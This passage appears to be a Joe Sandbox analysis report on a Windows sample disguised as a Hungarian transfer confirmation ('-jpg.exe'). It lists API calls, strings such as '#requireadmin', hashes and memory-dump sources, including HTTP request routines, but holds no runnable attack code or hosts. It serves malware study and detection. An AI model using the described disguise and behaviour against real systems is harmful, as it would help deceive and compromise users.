                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove$_memcmp
                                                                                                          • String ID: '$\$h
                                                                                                          • API String ID: 2205784470-1303700344
                                                                                                          • Opcode ID: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                                                                                          • Instruction ID: e67660c870af743a7fabfec7c4e9e8b186464fd05e4f656457aecd1ba61caca8
                                                                                                          • Opcode Fuzzy Hash: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                                                                                          • Instruction Fuzzy Hash: 5CE1C070A002498FDB18CFA9D8806BEFBF2FF89304F28816ED84697341D778A945CB54
                                                                                                          APIs
                                                                                                          • VariantInit.OLEAUT32(00000000), ref: 0045EA56
                                                                                                          • VariantCopy.OLEAUT32(00000000), ref: 0045EA60
                                                                                                          • VariantClear.OLEAUT32 ref: 0045EA6D
                                                                                                          • VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
                                                                                                          • __swprintf.LIBCMT ref: 0045EC33
                                                                                                          • VariantInit.OLEAUT32(00000000), ref: 0045ECEE
                                                                                                          Strings
                                                                                                          • %4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Variant$InitTime$ClearCopySystem__swprintf
                                                                                                          • String ID: %4d%02d%02d%02d%02d%02d
                                                                                                          • API String ID: 2441338619-1568723262
                                                                                                          • Opcode ID: ba21fae3964782e52667caf67f57b1ece5b73a8e74dd4204ce642d4b919161a9
                                                                                                          • Instruction ID: 6ef9d3a4897ddb850998a39013325e9d2daf595bbef4806ea59c93c68b265cd6
                                                                                                          • Opcode Fuzzy Hash: ba21fae3964782e52667caf67f57b1ece5b73a8e74dd4204ce642d4b919161a9
                                                                                                          • Instruction Fuzzy Hash: F8A10873A0061487CB209F5AE48066AF7B0FF84721F1485AFED849B341C736AD99D7E5
                                                                                                          APIs
                                                                                                          • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
                                                                                                          • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
                                                                                                          • Sleep.KERNEL32(0000000A), ref: 0042C67F
                                                                                                          • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
                                                                                                          • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Interlocked$DecrementIncrement$Sleep
                                                                                                          • String ID: @COM_EVENTOBJ
                                                                                                          • API String ID: 327565842-2228938565
                                                                                                          • Opcode ID: 8d68769e25e8d01640c36805b8621208eaf5358c57efe8be0f1ba0a08893845a
                                                                                                          • Instruction ID: 079f2a2c733a9a3e151bbe14bd9981fb61a061d6167fc58a91b905d371dd4d86
                                                                                                          • Opcode Fuzzy Hash: 8d68769e25e8d01640c36805b8621208eaf5358c57efe8be0f1ba0a08893845a
                                                                                                          • Instruction Fuzzy Hash: 18D1D271A002198FDB10EF94C985BEEB7B0FF45304F60856AE5057B392D778AE46CB98
                                                                                                          APIs
                                                                                                          • VariantClear.OLEAUT32(?), ref: 0047031B
                                                                                                          • VariantClear.OLEAUT32(?), ref: 0047044F
                                                                                                          • VariantInit.OLEAUT32(?), ref: 004704A3
                                                                                                          • DispCallFunc.OLEAUT32(?,?,?,00000015,?,?,?,?), ref: 00470504
                                                                                                          • VariantClear.OLEAUT32(?), ref: 00470516
                                                                                                            • Part of subcall function 00435481: VariantCopy.OLEAUT32(?,?), ref: 00435492
                                                                                                          • VariantCopy.OLEAUT32(?,?), ref: 0047057A
                                                                                                            • Part of subcall function 00435403: VariantClear.OLEAUT32(?), ref: 00435414
                                                                                                          • VariantClear.OLEAUT32(00000000), ref: 0047060D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Variant$Clear$Copy$CallDispFuncInit
                                                                                                          • String ID: H
                                                                                                          • API String ID: 3613100350-2852464175
                                                                                                          • Opcode ID: 3653b9c9f3c385f97f89112f5105d29a1c420b11bc29a6964f6d9efc47683255
                                                                                                          • Instruction ID: 4e55d858753f5aac0b63ea9498fb9ef25a468b81cfd7169f1740116cc4944d08
                                                                                                          • Opcode Fuzzy Hash: 3653b9c9f3c385f97f89112f5105d29a1c420b11bc29a6964f6d9efc47683255
                                                                                                          • Instruction Fuzzy Hash: 93B15BB5605311EFD710DF54C880A6BB3A4FF88308F049A2EFA8997351D738E951CB9A
                                                                                                          APIs
                                                                                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
                                                                                                          • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
                                                                                                          • InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
                                                                                                          • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
                                                                                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
                                                                                                          • HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
                                                                                                            • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                                                                                                          • String ID:
                                                                                                          • API String ID: 1291720006-3916222277
                                                                                                          • Opcode ID: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                                                                          • Instruction ID: 89538bfc19842651326e528327905a39262a83d8aa3acd63c003c629d13479a9
                                                                                                          • Opcode Fuzzy Hash: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                                                                          • Instruction Fuzzy Hash: FA51B1756403087BF710DF56DC86FEBB7A8FB88715F00851EFB0196281D7B8A5148BA8
                                                                                                          APIs
                                                                                                          • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FC48
                                                                                                          • IsMenu.USER32(?), ref: 0045FC5F
                                                                                                          • CreatePopupMenu.USER32 ref: 0045FC97
                                                                                                          • GetMenuItemCount.USER32(?), ref: 0045FCFD
                                                                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0045FD26
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                          • String ID: 0$2
                                                                                                          • API String ID: 93392585-3793063076
                                                                                                          • Opcode ID: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                                                                          • Instruction ID: a5f6d3c146e885c54ead74f35c39eec4acd60bc9fc93d28bc39e3d14768ea649
                                                                                                          • Opcode Fuzzy Hash: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                                                                          • Instruction Fuzzy Hash: B55192719002099BDB11DF69D888BAF7BB4BB44319F14853EEC15DB282D3B8984CCB66
                                                                                                          APIs
                                                                                                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
                                                                                                          • VariantClear.OLEAUT32(?), ref: 00435320
                                                                                                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
                                                                                                          • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
                                                                                                          • VariantClear.OLEAUT32(?), ref: 004353B3
                                                                                                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
                                                                                                          • String ID: crts
                                                                                                          • API String ID: 586820018-3724388283
                                                                                                          • Opcode ID: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                                                                          • Instruction ID: e94501f388d0d73ced66c0aa9444ce68fa972137b9c89e1913ae9ea64c05cbbc
                                                                                                          • Opcode Fuzzy Hash: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                                                                          • Instruction Fuzzy Hash: DE418BB5200208EBDB10CF1CD884A9AB7B5FF9C314F20852AEE49CB351E775E911CBA4
                                                                                                          APIs
                                                                                                            • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe,0040F545,C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe,004A90E8,C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe,?,0040F545), ref: 0041013C
                                                                                                          • lstrcmpiW.KERNEL32(?,?), ref: 0044BC09
                                                                                                          • MoveFileW.KERNEL32(?,?), ref: 0044BC3F
                                                                                                          • _wcscat.LIBCMT ref: 0044BCAF
                                                                                                          • _wcslen.LIBCMT ref: 0044BCBB
                                                                                                          • _wcslen.LIBCMT ref: 0044BCD1
                                                                                                          • SHFileOperationW.SHELL32(?), ref: 0044BD17
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                                                                                                          • String ID: \*.*
                                                                                                          • API String ID: 2326526234-1173974218
                                                                                                          • Opcode ID: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                                                                          • Instruction ID: cfb238852dc788c6f4e4306d35388aa956c556a9525b71239849112dc74cb112
                                                                                                          • Opcode Fuzzy Hash: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                                                                          • Instruction Fuzzy Hash: 5C3184B1800219AACF14EFB1DC85ADEB3B5AF48304F5095EEE90997211EB35D748CB98
                                                                                                          APIs
                                                                                                            • Part of subcall function 00433244: _wcsncpy.LIBCMT ref: 0043325C
                                                                                                          • _wcslen.LIBCMT ref: 004335F2
                                                                                                          • GetFileAttributesW.KERNEL32(?), ref: 0043361C
                                                                                                          • GetLastError.KERNEL32 ref: 0043362B
                                                                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
                                                                                                          • _wcsrchr.LIBCMT ref: 00433666
                                                                                                            • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                                                                                                          • String ID: \
                                                                                                          • API String ID: 321622961-2967466578
                                                                                                          • Opcode ID: 4d62cddd39e6499c0bf6f3e67d5a9631e2ea97a5f8ad0550c3b0128d52bea9a3
                                                                                                          • Instruction ID: 66c6ecc179b40ab72a0151a8d865592f5e80cbeaaa2383c239fb12261b929cf9
                                                                                                          • Opcode Fuzzy Hash: 4d62cddd39e6499c0bf6f3e67d5a9631e2ea97a5f8ad0550c3b0128d52bea9a3
                                                                                                          • Instruction Fuzzy Hash: C72129719013146ADF30AF25AC06BEB73AC9B05715F10569AFD18C2241E6799A888BE9
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __wcsnicmp
                                                                                                          • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                          • API String ID: 1038674560-2734436370
                                                                                                          • Opcode ID: 769a1168dbf3b056e6a3c570e5d7bf636aa566bb12a42c52eeb89d6cb06eb2f1
                                                                                                          • Instruction ID: d05ed79ef8649e951018b8bbb1c2d61e3c33a7345c6b0b1fc41c187b8edaa79f
                                                                                                          • Opcode Fuzzy Hash: 769a1168dbf3b056e6a3c570e5d7bf636aa566bb12a42c52eeb89d6cb06eb2f1
                                                                                                          • Instruction Fuzzy Hash: 1221003365151066E72176199C82FDBB3989FA5314F04442BFE049B242D26EF99A83E9
                                                                                                          APIs
                                                                                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048D148,00000008,00417A44,00000000,00000000,?,004115F6,?,00401BAC,?,?,?), ref: 0041794D
                                                                                                          • __lock.LIBCMT ref: 00417981
                                                                                                            • Part of subcall function 004182CB: __mtinitlocknum.LIBCMT ref: 004182E1
                                                                                                            • Part of subcall function 004182CB: __amsg_exit.LIBCMT ref: 004182ED
                                                                                                            • Part of subcall function 004182CB: EnterCriticalSection.KERNEL32(004115F6,004115F6,?,00417986,0000000D,?,004115F6,?,00401BAC,?,?,?), ref: 004182F5
                                                                                                          • InterlockedIncrement.KERNEL32(FF00482A), ref: 0041798E
                                                                                                          • __lock.LIBCMT ref: 004179A2
                                                                                                          • ___addlocaleref.LIBCMT ref: 004179C0
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                                                          • String ID: KERNEL32.DLL$pI
                                                                                                          • API String ID: 637971194-197072765
                                                                                                          • Opcode ID: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                                                                          • Instruction ID: a50d44c6e21ae10dfe2421e8c890a682036196f235240147777d58dc068d601e
                                                                                                          • Opcode Fuzzy Hash: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                                                                          • Instruction Fuzzy Hash: A401A171404B00EFD720AF66C90A78DBBF0AF50324F20890FE496536A1CBB8A684CB5D
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove$_malloc
                                                                                                          • String ID:
                                                                                                          • API String ID: 1938898002-0
                                                                                                          • Opcode ID: e7d2170c55f7dc781d7a380fa012853440c6ce733db375b884678bad7424ae85
                                                                                                          • Instruction ID: bb51e0d14dcfee45c4d36839732496dc4400bff611838f67d83ec86e680bb9ef
                                                                                                          • Opcode Fuzzy Hash: e7d2170c55f7dc781d7a380fa012853440c6ce733db375b884678bad7424ae85
                                                                                                          • Instruction Fuzzy Hash: FC81CB726001195BDB00EF66DC42AFF7368EF84318F040A6FFD04A7282EE7D995587A9
                                                                                                          APIs
                                                                                                          • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7
                                                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                          • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 0044B4F7
                                                                                                          • _memmove.LIBCMT ref: 0044B555
                                                                                                          • _memmove.LIBCMT ref: 0044B578
                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 0044B587
                                                                                                          • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0044B5A3
                                                                                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5B8
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
                                                                                                          • String ID:
                                                                                                          • API String ID: 2737351978-0
                                                                                                          • Opcode ID: 15c89243ef38b9e681754c30b7b739330f64afb75777a21f57b4f83e6b8eed0a
                                                                                                          • Instruction ID: 70cbfa243a2dcbaabd352bc30cb9c3ad46017a318630e818b765f133545e4983
                                                                                                          • Opcode Fuzzy Hash: 15c89243ef38b9e681754c30b7b739330f64afb75777a21f57b4f83e6b8eed0a
                                                                                                          • Instruction Fuzzy Hash: 4F41BC71900308EFDB20DF55D984EAFB7B8EF48704F10896EF54696650D7B4EA80CB58
                                                                                                          APIs
